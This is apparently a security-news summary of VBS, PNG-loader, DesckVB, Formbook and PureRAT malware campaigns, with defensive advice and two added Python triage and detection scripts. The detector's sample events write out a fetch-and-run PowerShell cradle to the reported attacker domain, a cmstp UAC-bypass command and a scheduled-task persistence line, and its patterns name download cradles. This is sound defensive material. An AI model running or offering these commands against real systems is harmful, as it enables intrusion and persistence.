Malware - Open Directory Campaign Uses Obfuscated VBS Files

A malware campaign that uses obfuscated VBS scripts and PNG-embedded loaders to deploy several RATs through a multi-stage chain has emerged. New reporting on the related PureRAT campaign details LNK-file delivery and Task Scheduler persistence.

Malware & Ransomware · Severity: HIGH · 5 sources

Original Reporting

Cyber Security News · Tushar Subhra Dutta

AI Summary

CyberPings AI · Reviewed by Rohit Rana

A new type of malware is using tricky methods to sneak into computers, like hiding in harmless-looking files. It's important for companies to be extra careful and watch out for suspicious activities to keep their systems safe.

What Happened

A sophisticated malware campaign has emerged, utilizing obfuscated Visual Basic Script (VBS) files and PNG-embedded loaders to deploy Remote Access Trojans (RATs). This multi-stage attack was first detected in early 2026 during routine endpoint monitoring. What initially appeared to be a simple alert quickly unfolded into a well-organized operation, revealing a delivery framework capable of pushing various malware payloads from a single infrastructure.

The campaign began with a suspicious VBS file named Name_File.vbs, found in the \Users\Public\Downloads\ directory of a compromised system. SentinelOne's endpoint protection caught and quarantined the file, but its encoded content warranted further investigation. Analysts from LevelBlue discovered that this alert was just the tip of the iceberg: pivoting on it led to multiple obfuscated VBS files linked to different malware payloads, including XWorm variants and Remcos RAT.

In a related development, researchers have identified a new RAT called DesckVB, which employs heavily obfuscated JavaScript and a fileless .NET loader to evade detection. This malware starts its infection chain with a JavaScript file that drops a PowerShell script into the C:\Users\Public directory, mimicking the tactics seen in the VBS campaign. The use of Base64 encoding and string reversal to conceal command-and-control (C2) server addresses highlights a growing trend in malware development that prioritizes stealth and evasion.

Additionally, the Formbook malware campaign has been noted for its persistent use of multiple obfuscation techniques to deliver data-stealing malware. Formbook, which has been around since 2016, utilizes phishing emails to deliver its payloads, employing tactics such as DLL sideloading and obfuscated JavaScript to bypass detection mechanisms. This malware targets sensitive information, including login credentials and browser data, and has been observed in multiple campaigns across Europe and South America.

New insights have emerged regarding another RAT known as PureRAT, which hides its payload inside ordinary-looking PNG image files. The attack begins with a malicious .lnk file that, when opened, triggers a concealed PowerShell command. This command retrieves a PNG file containing a Base64-encoded portable executable (PE), which is decoded and executed entirely in memory, so the decoded executable never touches disk. This is the fileless pattern that makes detection by file-scanning tools increasingly difficult. The chain is not artifact-free, however: the .lnk, the downloaded PNG and the persistence mechanism are all on-disk or in the registry and are the items to hunt for. PureRAT establishes a Task Scheduler job for persistence and checks for virtual environments before executing its payload, which can perform host fingerprinting, keylogging, and credential theft.

Who's Being Targeted

This malware campaign targets organizations that may not have stringent security measures in place. The attackers hosted their infrastructure on an attacker-controlled domain, news4me[.]xyz, which exposed openly accessible directories. These directories staged the VBS launchers and hosted the obfuscated payload files, and because they were open, analysts were able to enumerate the full set of hosted payloads rather than only the one that triggered the original alert. The design lets the operators swap or add payloads quickly, making it a flexible and scalable threat. The DesckVB RAT similarly targets vulnerable systems, operating without leaving traditional file traces, which makes it a concern for both individuals and organizations. The combination of VBS- and JavaScript-based delivery suggests that attackers are diversifying their methods to maximize their chances of success; Formbook's dual use of DLL sideloading and obfuscated JavaScript is another instance of the same trend. PureRAT adds anti-analysis checks for virtual environments so that it stays dormant in sandboxes.

Signs of Infection

The infection mechanism begins with the VBS file, which contains no payload of its own and acts purely as a launcher. It executes a Base64-encoded PowerShell command that fetches a PNG file from a remote server. The PNG, innocuous to a casual look, carries the hidden malware, which is decoded and loaded directly into memory, allowing the attackers to maintain a low profile.
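The loaders described here (the VBS chain above and the PureRAT chain earlier) both carve a Base64-encoded PE out of a file that is, or claims to be, a PNG. The following triage script is an added example written for this page, not code from the reporting or from any of the malware families; it walks the PNG chunk list and reports a Base64 run that decodes to a DOS/PE header, whether that run sits behind IEND, inside an ancillary chunk such as tEXt, or in a file that has a .png name but no PNG signature at all. The sample files are constructed in the code and the embedded "PE" is a header stub, not a real binary.

```python
"""Triage a suspected PNG loader for a Base64-encoded PE (added example)."""
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# A Base64 run long enough to plausibly hold an executable (64+ chars, optional padding)
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def looks_like_pe(blob: bytes) -> bool:
    """True if blob starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_b64_pe(buf: bytes):
    """Return the first decoded PE hidden as a Base64 run inside buf, or None."""
    for m in B64_RUN.finditer(buf):
        run = m.group(0)
        run = run[: len(run) - len(run) % 4]  # b64decode needs a multiple of 4
        try:
            decoded = base64.b64decode(run, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if looks_like_pe(decoded):
            return decoded
    return None


def png_chunks(data: bytes):
    """Walk the chunk list; return (chunks, bytes trailing after IEND)."""
    pos = len(PNG_SIG)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        chunks.append((ctype, data[pos + 8: pos + 8 + length]))
        pos += 12 + length  # length field + type + payload + CRC
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def triage_png(data: bytes):
    """Report where a Base64-encoded PE hides; None means nothing found."""
    if not data.startswith(PNG_SIG):
        pe = find_b64_pe(data)
        return {"where": "not a PNG: Base64 text", "pe_size": len(pe)} if pe else None
    chunks, trailing = png_chunks(data)
    for ctype, payload in chunks:
        pe = find_b64_pe(payload)
        if pe:
            return {"where": f"chunk {ctype.decode('ascii', 'replace')}", "pe_size": len(pe)}
    pe = find_b64_pe(trailing)
    if pe:
        return {"where": f"{len(trailing)} bytes after IEND", "pe_size": len(pe)}
    return None


# --- constructed sample inputs (not captured from the campaign) ---
def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_clean_png() -> bytes:
    """A valid 1x1 greyscale PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def make_fake_pe(size: int = 0x200) -> bytes:
    """A PE header stub (MZ, e_lfanew -> 'PE\\0\\0'); not a runnable binary."""
    pe = bytearray(size)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x80)
    pe[0x80:0x84] = b"PE\x00\x00"
    return bytes(pe)


CLEAN_PNG = make_clean_png()
BARE_B64 = base64.b64encode(make_fake_pe())            # a ".png" that is just Base64 text
STEGO_PNG = CLEAN_PNG + BARE_B64                         # PE appended behind IEND
TEXT_CHUNK_PNG = (CLEAN_PNG[:-12] + _chunk(b"tEXt", b"Comment\x00" + BARE_B64)
                  + _chunk(b"IEND", b""))                # PE tucked into a tEXt chunk

if __name__ == "__main__":
    for name, sample in [("clean", CLEAN_PNG), ("appended", STEGO_PNG),
                         ("tEXt", TEXT_CHUNK_PNG), ("bare", BARE_B64)]:
        print(f"{name:9s} {triage_png(sample)}")
```

Run it against a quarantined image to get a quick yes/no before spending reverse-engineering time; a hit in a tEXt chunk or behind IEND is a strong signal because a legitimate encoder writes neither. Treat a clean result as "no plain Base64 PE found", not as "benign": a loader that XORs or compresses the payload before encoding, or splits it across pixel data, will need a sample-specific carver.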

Once running, the loader fetches additional payloads, including an instance of Remcos RAT and a DLL built to bypass User Account Control (UAC). This gives the attackers persistent, elevated access while leaving minimal traces on disk, which complicates detection for security teams. DesckVB RAT likewise relies on layered obfuscation and in-memory execution to hide its purpose from conventional antivirus tools. Formbook hides its payloads inside obfuscated JavaScript and PDF files. PureRAT combines image-based payload concealment with in-memory delivery so that its operations stay concealed.

How to Protect Yourself

Organizations should act now to reduce the risk from this campaign. Restricting execution of VBS and BAT files from user-writable directories (Users\Public, Downloads, AppData, Temp) is crucial; AppLocker or WDAC path rules are the usual way to do this. Enforcing PowerShell Constrained Language Mode and enabling script block and module logging (script block contents land in Event ID 4104) gives visibility into the decoded commands that these launchers run in memory.

At the network level, blocking WebDAV connections and filtering .xyz domains can limit access to the attacker's infrastructure. Blocking an entire TLD is a blunt control, so pair it with a block on the named domain and alerting on connections to rarely-seen or newly registered domains. Organizations should not rely on endpoint protection alone but also pursue deeper threat intelligence investigations to uncover the broader infrastructure: stopping one alert is not enough while the hosting infrastructure remains active and ready to push new payloads. Keeping endpoint protection current is critical, since detection tools have already flagged key components of both the VBS and DesckVB campaigns. For PureRAT, monitor for LNK-initiated PowerShell activity, atypical cmstp.exe use, and recurring Task Scheduler creation. For Formbook, watch for suspicious archive-based email attachments and anomalous DLL loading. More generally, harden endpoints against fileless attacks by monitoring and restricting the built-in Windows binaries these campaigns abuse.
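The monitoring advice above names four patterns: script hosts running .vbs files from user-writable paths, PowerShell launched with an encoded or hidden-window command from explorer.exe (what a double-clicked .lnk looks like), cmstp.exe invoked with the /ni /s switches used for UAC bypass (MITRE ATT&CK T1218.003), and schtasks.exe creating tasks. The detector below is an added example written for this page, not a rule shipped by any of the vendors cited; it scores constructed process-creation events (the field names parent, image and cmdline are assumptions, mapped from whatever your EDR or Sysmon Event ID 1 exposes) and decodes -EncodedCommand payloads so that download cradles hidden in Base64 are still caught. The domain news4me[.]xyz is from the reporting; the URL path and task name are invented for the sample.

```python
"""Score process-creation events for the LOLBin patterns named in the article (added example)."""
import base64
import re
from dataclasses import dataclass

USER_WRITABLE = re.compile(r"\\(users\\public|downloads|appdata|temp)\\", re.I)
CRADLE = re.compile(
    r"(DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|\bIEX\b|Invoke-Expression|FromBase64String)", re.I)
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_ARG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


@dataclass
class ProcEvent:
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries Base64 of UTF-16LE text; return the text or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcEvent):
    """Return the detection tags for one event; an empty list means nothing notable."""
    tags = []
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent.lower().rsplit("\\", 1)[-1]
    cmd = ev.cmdline
    if image in ("wscript.exe", "cscript.exe") and re.search(r"\.vbs\b", cmd, re.I) \
            and USER_WRITABLE.search(cmd):
        tags.append("vbs-from-user-writable-path")
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            tags.append("powershell-encoded-command")
        body = decoded if decoded is not None else cmd   # inspect the decoded script, not the wrapper
        if HIDDEN_ARG.search(cmd):
            tags.append("powershell-hidden-window")
        if CRADLE.search(body):
            tags.append("powershell-download-cradle")
            if re.search(r"\.png\b", body, re.I):
                tags.append("png-fetched-by-script")
        # explorer.exe -> hidden/encoded PowerShell is the shape of an LNK-initiated launch
        if parent == "explorer.exe" and any(t in tags for t in
                                            ("powershell-encoded-command", "powershell-hidden-window")):
            tags.append("lnk-style-launch")
    if image == "cmstp.exe" and re.search(r"/ni\b.*/s\b|/s\b.*/ni\b", cmd, re.I):
        tags.append("cmstp-uac-bypass-pattern")   # cmstp.exe /ni /s <inf>, T1218.003
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        tags.append("scheduled-task-created")
        if USER_WRITABLE.search(cmd):
            tags.append("task-runs-from-user-writable-path")
    return tags


def scan(events):
    """Return [(image, tags)] for every event that produced at least one tag."""
    hits = []
    for ev in events:
        tags = score_event(ev)
        if tags:
            hits.append((ev.image, tags))
    return hits


# --- constructed sample events (not captured telemetry) ---
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('hxxp://news4me[.]xyz/loader.png')"
ENC = base64.b64encode(CRADLE_TEXT.encode("utf-16-le")).decode("ascii")
PUB = r"C:\Users\Public\Downloads"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              rf'wscript.exe "{PUB}\Name_File.vbs"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -w hidden -enc {ENC}"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmstp.exe",
              rf"cmstp.exe /ni /s {PUB}\update.inf"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\schtasks.exe",
              rf'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "wscript.exe {PUB}\Name_File.vbs"'),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -File "C:\Program Files\Vendor\health.ps1"'),  # benign
]

if __name__ == "__main__":
    for image, tags in scan(SAMPLE_EVENTS):
        print(f"{image.rsplit(chr(92), 1)[-1]:16s} {', '.join(tags)}")
```

The per-event tags are deliberately narrow so they can be combined: one of them alone (a scheduled task, a hidden PowerShell window) is routine on a managed fleet, but an LNK-style launch that fetches a .png followed within minutes by cmstp.exe and a task pointing at Users\Public is the sequence this campaign produces, and that is the correlation worth alerting on.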

Pro Insight

The evolving tactics employed in this malware campaign underscore the need for organizations to adopt a multi-layered security approach, focusing not only on endpoint protection but also on network-level defenses and continuous monitoring of suspicious activities.

Story Timeline

Story broke by Cyber Security News

Covered by Microsoft Security Blog

Covered by Cyber Security News

Covered by Infosecurity Magazine

Covered by SC Media
